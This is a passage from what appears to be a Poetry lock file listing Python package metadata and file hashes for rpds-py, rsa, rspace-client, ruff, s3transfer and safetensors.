= "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5a53f5998b4bbff1cb2e967e66ab2addc67326a274567697379dd1e326bded7"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:6a555ae3d2e61118a9d3e549737bb4a56ff0cec88a22bd1dfcad5b4e04759175"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:945eb4b6bb8144909b203a88a35e0a03d22b57aefb06c9b26c6e16d72e5eb0f0"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:52c215eb46307c25f9fd2771cac8135d14b11a92ae48d17968eda5aa9aaf5071"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c1b3cd23d905589cb205710b3988fc8f46d4a198cf12862887b09d7aaa6bf9b9"}, {file = "rpds_py-0.10.6-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:64ccc28683666672d7c166ed465c09cee36e306c156e787acef3c0c62f90da5a"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:516a611a2de12fbea70c78271e558f725c660ce38e0006f75139ba337d56b1f6"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:9ff93d3aedef11f9c4540cf347f8bb135dd9323a2fc705633d83210d464c579d"}, {file = "rpds_py-0.10.6-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:d858532212f0650be12b6042ff4378dc2efbb7792a286bee4489eaa7ba010586"}, {file = "rpds_py-0.10.6-cp312-none-win32.whl", hash = "sha256:3c4eff26eddac49d52697a98ea01b0246e44ca82ab09354e94aae8823e8bda02"}, {file = "rpds_py-0.10.6-cp312-none-win_amd64.whl", hash = "sha256:150eec465dbc9cbca943c8e557a21afdcf9bab8aaabf386c44b794c2f94143d2"}, {file = "rpds_py-0.10.6-cp38-cp38-macosx_10_7_x86_64.whl", hash = "sha256:cf693eb4a08eccc1a1b636e4392322582db2a47470d52e824b25eca7a3977b53"}, {file = "rpds_py-0.10.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4134aa2342f9b2ab6c33d5c172e40f9ef802c61bb9ca30d21782f6e035ed0043"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e782379c2028a3611285a795b89b99a52722946d19fc06f002f8b53e3ea26ea9"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:2f6da6d842195fddc1cd34c3da8a40f6e99e4a113918faa5e60bf132f917c247"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b4a9fe992887ac68256c930a2011255bae0bf5ec837475bc6f7edd7c8dfa254e"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b788276a3c114e9f51e257f2a6f544c32c02dab4aa7a5816b96444e3f9ffc336"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:caa1afc70a02645809c744eefb7d6ee8fef7e2fad170ffdeacca267fd2674f13"}, {file = "rpds_py-0.10.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:bddd4f91eede9ca5275e70479ed3656e76c8cdaaa1b354e544cbcf94c6fc8ac4"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:775049dfa63fb58293990fc59473e659fcafd953bba1d00fc5f0631a8fd61977"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:c6c45a2d2b68c51fe3d9352733fe048291e483376c94f7723458cfd7b473136b"}, {file = "rpds_py-0.10.6-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0699ab6b8c98df998c3eacf51a3b25864ca93dab157abe358af46dc95ecd9801"}, {file = "rpds_py-0.10.6-cp38-none-win32.whl", hash = "sha256:ebdab79f42c5961682654b851f3f0fc68e6cc7cd8727c2ac4ffff955154123c1"}, {file = 
"rpds_py-0.10.6-cp38-none-win_amd64.whl", hash = "sha256:24656dc36f866c33856baa3ab309da0b6a60f37d25d14be916bd3e79d9f3afcf"}, {file = "rpds_py-0.10.6-cp39-cp39-macosx_10_7_x86_64.whl", hash = "sha256:0898173249141ee99ffcd45e3829abe7bcee47d941af7434ccbf97717df020e5"}, {file = "rpds_py-0.10.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9e9184fa6c52a74a5521e3e87badbf9692549c0fcced47443585876fcc47e469"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5752b761902cd15073a527b51de76bbae63d938dc7c5c4ad1e7d8df10e765138"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:99a57006b4ec39dbfb3ed67e5b27192792ffb0553206a107e4aadb39c5004cd5"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:09586f51a215d17efdb3a5f090d7cbf1633b7f3708f60a044757a5d48a83b393"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e225a6a14ecf44499aadea165299092ab0cba918bb9ccd9304eab1138844490b"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b2039f8d545f20c4e52713eea51a275e62153ee96c8035a32b2abb772b6fc9e5"}, {file = "rpds_py-0.10.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:34ad87a831940521d462ac11f1774edf867c34172010f5390b2f06b85dcc6014"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:dcdc88b6b01015da066da3fb76545e8bb9a6880a5ebf89e0f0b2e3ca557b3ab7"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:25860ed5c4e7f5e10c496ea78af46ae8d8468e0be745bd233bab9ca99bfd2647"}, {file = "rpds_py-0.10.6-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:7854a207ef77319ec457c1eb79c361b48807d252d94348305db4f4b62f40f7f3"}, {file = "rpds_py-0.10.6-cp39-none-win32.whl", hash = "sha256:e6fcc026a3f27c1282c7ed24b7fcac82cdd70a0e84cc848c0841a3ab1e3dea2d"}, {file = "rpds_py-0.10.6-cp39-none-win_amd64.whl", hash = "sha256:e98c4c07ee4c4b3acf787e91b27688409d918212dfd34c872201273fdd5a0e18"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_10_7_x86_64.whl", hash = "sha256:68fe9199184c18d997d2e4293b34327c0009a78599ce703e15cd9a0f47349bba"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3339eca941568ed52d9ad0f1b8eb9fe0958fa245381747cecf2e9a78a5539c42"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a360cfd0881d36c6dc271992ce1eda65dba5e9368575663de993eeb4523d895f"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:031f76fc87644a234883b51145e43985aa2d0c19b063e91d44379cd2786144f8"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1f36a9d751f86455dc5278517e8b65580eeee37d61606183897f122c9e51cef3"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:052a832078943d2b2627aea0d19381f607fe331cc0eb5df01991268253af8417"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:023574366002bf1bd751ebaf3e580aef4a468b3d3c216d2f3f7e16fdabd885ed"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:defa2c0c68734f4a82028c26bcc85e6b92cced99866af118cd6a89b734ad8e0d"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_aarch64.whl", hash = 
"sha256:879fb24304ead6b62dbe5034e7b644b71def53c70e19363f3c3be2705c17a3b4"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_i686.whl", hash = "sha256:53c43e10d398e365da2d4cc0bcaf0854b79b4c50ee9689652cdc72948e86f487"}, {file = "rpds_py-0.10.6-pp310-pypy310_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:3777cc9dea0e6c464e4b24760664bd8831738cc582c1d8aacf1c3f546bef3f65"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_10_7_x86_64.whl", hash = "sha256:40578a6469e5d1df71b006936ce95804edb5df47b520c69cf5af264d462f2cbb"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:cf71343646756a072b85f228d35b1d7407da1669a3de3cf47f8bbafe0c8183a4"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:10f32b53f424fc75ff7b713b2edb286fdbfc94bf16317890260a81c2c00385dc"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:81de24a1c51cfb32e1fbf018ab0bdbc79c04c035986526f76c33e3f9e0f3356c"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac17044876e64a8ea20ab132080ddc73b895b4abe9976e263b0e30ee5be7b9c2"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5e8a78bd4879bff82daef48c14d5d4057f6856149094848c3ed0ecaf49f5aec2"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:78ca33811e1d95cac8c2e49cb86c0fb71f4d8409d8cbea0cb495b6dbddb30a55"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c63c3ef43f0b3fb00571cff6c3967cc261c0ebd14a0a134a12e83bdb8f49f21f"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:7fde6d0e00b2fd0dbbb40c0eeec463ef147819f23725eda58105ba9ca48744f4"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_i686.whl", hash = "sha256:79edd779cfc46b2e15b0830eecd8b4b93f1a96649bcb502453df471a54ce7977"}, {file = "rpds_py-0.10.6-pp38-pypy38_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:9164ec8010327ab9af931d7ccd12ab8d8b5dc2f4c6a16cbdd9d087861eaaefa1"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_10_7_x86_64.whl", hash = "sha256:d29ddefeab1791e3c751e0189d5f4b3dbc0bbe033b06e9c333dca1f99e1d523e"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:30adb75ecd7c2a52f5e76af50644b3e0b5ba036321c390b8e7ec1bb2a16dd43c"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:dd609fafdcdde6e67a139898196698af37438b035b25ad63704fd9097d9a3482"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:6eef672de005736a6efd565577101277db6057f65640a813de6c2707dc69f396"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6cf4393c7b41abbf07c88eb83e8af5013606b1cdb7f6bc96b1b3536b53a574b8"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ad857f42831e5b8d41a32437f88d86ead6c191455a3499c4b6d15e007936d4cf"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d7360573f1e046cb3b0dceeb8864025aa78d98be4bb69f067ec1c40a9e2d9df"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d08f63561c8a695afec4975fae445245386d645e3e446e6f260e81663bfd2e38"}, {file = 
"rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_aarch64.whl", hash = "sha256:f0f17f2ce0f3529177a5fff5525204fad7b43dd437d017dd0317f2746773443d"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_i686.whl", hash = "sha256:442626328600bde1d09dc3bb00434f5374948838ce75c41a52152615689f9403"}, {file = "rpds_py-0.10.6-pp39-pypy39_pp73-musllinux_1_2_x86_64.whl", hash = "sha256:e9616f5bd2595f7f4a04b67039d890348ab826e943a9bfdbe4938d0eba606971"}, {file = "rpds_py-0.10.6.tar.gz", hash = "sha256:4ce5a708d65a8dbf3748d2474b580d606b1b9f91b5c6ab2a316e0b0cf7a4ba50"}, ] [[package]] name = "rsa" version = "4.9" description = "Pure-Python RSA implementation" optional = true python-versions = ">=3.6,<4" files = [ {file = "rsa-4.9-py3-none-any.whl", hash = "sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7"}, {file = "rsa-4.9.tar.gz", hash = "sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21"}, ] [package.dependencies] pyasn1 = ">=0.1.3" [[package]] name = "rspace-client" version = "2.5.0" description = "A client for calling RSpace ELN and Inventory APIs" optional = true python-versions = ">=3.7.11,<4.0.0" files = [ {file = "rspace-client-2.5.0.tar.gz", hash = "sha256:101abc83d094051d2babcaa133fa1a47221b3d5953d72eef3c331ef7084071a1"}, {file = "rspace_client-2.5.0-py3-none-any.whl", hash = "sha256:b1072df88dfa8f068f3137584d20cf135493b0521a9809c2f6ddec6b378a9cc3"}, ] [package.dependencies] beautifulsoup4 = ">=4.9.3,<5.0.0" requests = ">=2.25.1,<3.0.0" [[package]] name = "ruff" version = "0.1.3" description = "An extremely fast Python linter, written in Rust." optional = false python-versions = ">=3.7" files = [ {file = "ruff-0.1.3-py3-none-macosx_10_7_x86_64.whl", hash = "sha256:b46d43d51f7061652eeadb426a9e3caa1e0002470229ab2fc19de8a7b0766901"}, {file = "ruff-0.1.3-py3-none-macosx_10_9_x86_64.macosx_11_0_arm64.macosx_10_9_universal2.whl", hash = "sha256:b8afeb9abd26b4029c72adc9921b8363374f4e7edb78385ffaa80278313a15f9"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ca3cf365bf32e9ba7e6db3f48a4d3e2c446cd19ebee04f05338bc3910114528b"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4874c165f96c14a00590dcc727a04dca0cfd110334c24b039458c06cf78a672e"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eec2dd31eed114e48ea42dbffc443e9b7221976554a504767ceaee3dd38edeb8"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:dc3ec4edb3b73f21b4aa51337e16674c752f1d76a4a543af56d7d04e97769613"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e3de9ed2e39160800281848ff4670e1698037ca039bda7b9274f849258d26ce"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1c595193881922cc0556a90f3af99b1c5681f0c552e7a2a189956141d8666fe8"}, {file = "ruff-0.1.3-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f75e670d529aa2288cd00fc0e9b9287603d95e1536d7a7e0cafe00f75e0dd9d"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:76dd49f6cd945d82d9d4a9a6622c54a994689d8d7b22fa1322983389b4892e20"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:918b454bc4f8874a616f0d725590277c42949431ceb303950e87fef7a7d94cb3"}, {file = "ruff-0.1.3-py3-none-musllinux_1_2_i686.whl", hash = "sha256:d8859605e729cd5e53aa38275568dbbdb4fe882d2ea2714c5453b678dca83784"}, {file = 
"ruff-0.1.3-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:0b6c55f5ef8d9dd05b230bb6ab80bc4381ecb60ae56db0330f660ea240cb0d4a"}, {file = "ruff-0.1.3-py3-none-win32.whl", hash = "sha256:3e7afcbdcfbe3399c34e0f6370c30f6e529193c731b885316c5a09c9e4317eef"}, {file = "ruff-0.1.3-py3-none-win_amd64.whl", hash = "sha256:7a18df6638cec4a5bd75350639b2bb2a2366e01222825562c7346674bdceb7ea"}, {file = "ruff-0.1.3-py3-none-win_arm64.whl", hash = "sha256:12fd53696c83a194a2db7f9a46337ce06445fb9aa7d25ea6f293cf75b21aca9f"}, {file = "ruff-0.1.3.tar.gz", hash = "sha256:3ba6145369a151401d5db79f0a47d50e470384d0d89d0d6f7fab0b589ad07c34"}, ] [[package]] name = "s3transfer" version = "0.7.0" description = "An Amazon S3 Transfer Manager" optional = true python-versions = ">= 3.7" files = [ {file = "s3transfer-0.7.0-py3-none-any.whl", hash = "sha256:10d6923c6359175f264811ef4bf6161a3156ce8e350e705396a7557d6293c33a"}, {file = "s3transfer-0.7.0.tar.gz", hash = "sha256:fd3889a66f5fe17299fe75b82eae6cf722554edca744ca5d5fe308b104883d2e"}, ] [package.dependencies] botocore = ">=1.12.36,<2.0a.0" [package.extras] crt = ["botocore[crt] (>=1.20.29,<2.0a.0)"] [[package]] name = "safetensors" version = "0.4.0" description = "" optional = true python-versions = ">=3.7" files = [ {file = "safetensors-0.4.0-cp310-cp310-macosx_10_7_x86_64.whl", hash = "sha256:2289ae6dbe6d027ecee016b28ced13a2e21a0b3a3a757a23033a2d1c0b1bad55"}, {file = "safetensors-0.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:bf6458959f310f551cbbeef2255527ade5f783f952738e73e4d0136198cc3bfe"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6b60a58a8f7cc7aed3b5b73dce1f5259a53c83d9ba43a76a874e6ad868c1b4d"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:491b3477e4d0d4599bb75d79da4b75af2e6ed9b1f6ec2b715991f0bc927bf09a"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:59d2e10b7e0cd18bb73ed7c17c624a5957b003b81345e18159591771c26ee428"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3f667a4c12fb593f5f66ce966cb1b14a7148898b2b1a7f79e0761040ae1e3c51"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f9909512bcb6f712bdd04c296cdfb0d8ff73d258ffc5af884bb62ea02d221e0"}, {file = "safetensors-0.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d33d29e846821f0e4f92614022949b09ccf063cb36fe2f9fe099cde1efbfbb87"}, {file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:4d512525a8e05a045ce6698066ba0c5378c174a83e0b3720a8c7799dc1bb06f3"}, {file = "safetensors-0.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:0219cea445177f6ad1f9acd3a8d025440c8ff436d70a4a7c7ba9c36066aa9474"}, {file = "safetensors-0.4.0-cp310-none-win32.whl", hash = "sha256:67ab171eeaad6972d3971c53d29d53353c67f6743284c6d637b59fa3e54c8a94"}, {file = "safetensors-0.4.0-cp310-none-win_amd64.whl", hash = "sha256:7ffc736039f08a9ca1f09816a7481b8e4469c06e8f8a5ffa8cb67ddd79e6d77f"}, {file = "safetensors-0.4.0-cp311-cp311-macosx_10_7_x86_64.whl", hash = "sha256:4fe9e3737b30de458225a23926219ca30b902ee779b6a3df96eaab2b6d625ec2"}, {file = "safetensors-0.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e7916e814a90008de767b1c164a1d83803693c661ffe9af5a697b22e2752edb0"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:cbc4a4da01143472323c145f3c289e5f6fabde0ac0a3414dabf912a21692fff4"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:a54c21654a47669b38e359e8f852af754b786c9da884bb61ad5e9af12bd71ccb"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:25cd407955bad5340ba17f9f8ac789a0d751601a311e2f7b2733f9384478c95e"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:82e8fc4e3503cd738fd40718a430fe0e5ce6e7ff91a73d6ce628bbb89c41e8ce"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:48b92059b1a4ad163024d4f526e0e73ebe2bb3ae70537e15e347820b4de5dc27"}, {file = "safetensors-0.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:5daa05058f7dce85b5f9f60c4eab483ed7859d63978f08a76e52e78859ff20ca"}, {file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:a86565a5c112dd855909e20144947b4f53abb78c4de207f36ca71ee63ba5b90d"}, {file = "safetensors-0.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:38032078ed9fea52d06584e441bccc73fb475c4581600c6d6166de2fe2deb3d1"}, {file = "safetensors-0.4.0-cp311-none-win32.whl", hash = "sha256:2f99d90c91b7c76b40a862acd9085bc77f7974a27dee7cfcebe46149af5a99a1"}, {file = "safetensors-0.4.0-cp311-none-win_amd64.whl", hash = "sha256:74e2a448ffe19be188b457b130168190ee73b5a75e45ba96796320c1f5ae35d2"}, {file = "safetensors-0.4.0-cp312-cp312-macosx_10_7_x86_64.whl", hash = "sha256:1e2f9c69b41d03b4826ffb96b29e07444bb6b34a78a7bafd0b88d59e8ec75b8a"}, {file = "safetensors-0.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:3910fb5bf747413b59f1a34e6d2a993b589fa7d919709518823c70efaaa350bd"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf8fdca709b2470a35a59b1e6dffea75cbe1214b22612b5dd4c93947697aea8b"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:2f27b8ef814c5fb43456caeb7f3cbb889b76115180aad1f42402839c14a47c5b"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7b2d6101eccc43c7be0cb052f13ceda64288b3d8b344b988ed08d7133cbce2f3"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:fdc34027b545a69be3d4220c140b276129523e4e46db06ad1a0b60d6a4cf9214"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:db7bb48ca9e90bb9526c71b388d38d8de160c0354f4c5126df23e8701a870dcb"}, {file = "safetensors-0.4.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:a78ffc0795d3595cd9e4d453502e35f764276c49e434b25556a15a337db4dafc"}, {file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:8e735b0f79090f6855b55e205e820b7b595502ffca0009a5c13eef3661ce465b"}, {file = "safetensors-0.4.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:f8d2416734e850d5392afffbcb2b8985ea29fb171f1cb197e2ae51b8e35d6438"}, {file = "safetensors-0.4.0-cp37-cp37m-macosx_10_7_x86_64.whl", hash = "sha256:e853e189ba7d47eaf561094586692ba2bbdd258c096f1755805cac098de0e6ab"}, {file = "safetensors-0.4.0-cp37-cp37m-macosx_11_0_arm64.whl", hash = "sha256:4b2aa57b5a4d576f3d1dd6e56980026340f156f8a13c13016bfac4e25295b53f"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:3b6c1316ffde6cb4bf22c7445bc9fd224b4d1b9dd7320695f5611c89e802e4b6"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:003077ec85261d00061058fa12e3c1d2055366b02ce8f2938929359ffbaff2b8"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bd63d83a92f1437a8b0431779320376030ae43ace980bea5686d515de0784100"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2077801800b4b13301d8d6290c7fb5bd60737320001717153ebc4371776643b5"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7abe0e157a49a75aeeccfbc4f3dac38d8f98512d3cdb35c200f8e628dc5773cf"}, {file = "safetensors-0.4.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3bfed574f6b1e7e7fe1f17213278875ef6c6e8b1582ab6eda93947db1178cae6"}, {file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:964ef166a286ce3b023d0d0bd0e21d440a1c8028981c8abdb136bc7872ba9b3d"}, {file = "safetensors-0.4.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:44f84373e42183bd56a13a1f2d8acb1db7fedaeffbd83e79cec861477eee1af4"}, {file = "safetensors-0.4.0-cp37-none-win32.whl", hash = "sha256:c68132727dd86fb641102e494d445f705efe402f4d5e24b278183a15499ab400"}, {file = "safetensors-0.4.0-cp37-none-win_amd64.whl", hash = "sha256:1db87155454c168aef118d5657a403aee48a4cb08d8851a981157f07351ea317"}, {file = "safetensors-0.4.0-cp38-cp38-macosx_10_7_x86_64.whl", hash = "sha256:9e583fa68e5a07cc859c4e13c1ebff12029904aa2e27185cf04a1f57fe9a81c4"}, {file = "safetensors-0.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73e7696dcf3f72f99545eb1abe6106ad65ff1f62381d6ce4b34be3272552897a"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4936096a57c62e84e200f92620a536be067fc5effe46ecc7f230ebb496ecd579"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:87b328ee1591adac332543e1f5fc2c2d7f149b745ebb0d58d7850818ff9cee27"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b69554c143336256260eceff1d3c0969172a641b54d4668489a711b05f92a2c0"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:3ebf6bcece5d5d1bd6416472f94604d2c834ca752ac60ed42dba7157e595a990"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6686ce01b8602d55a7d9903c90d4a6e6f90aeb6ddced7cf4605892d0ba94bcb8"}, {file = "safetensors-0.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9b8fd6cc2f3bda444a048b541c843c7b7fefc89c4120d7898ea7d5b026e93891"}, {file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:8a6abfe67692f81b8bdb99c837f28351c17e624ebf136970c850ee989c720446"}, {file = "safetensors-0.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = 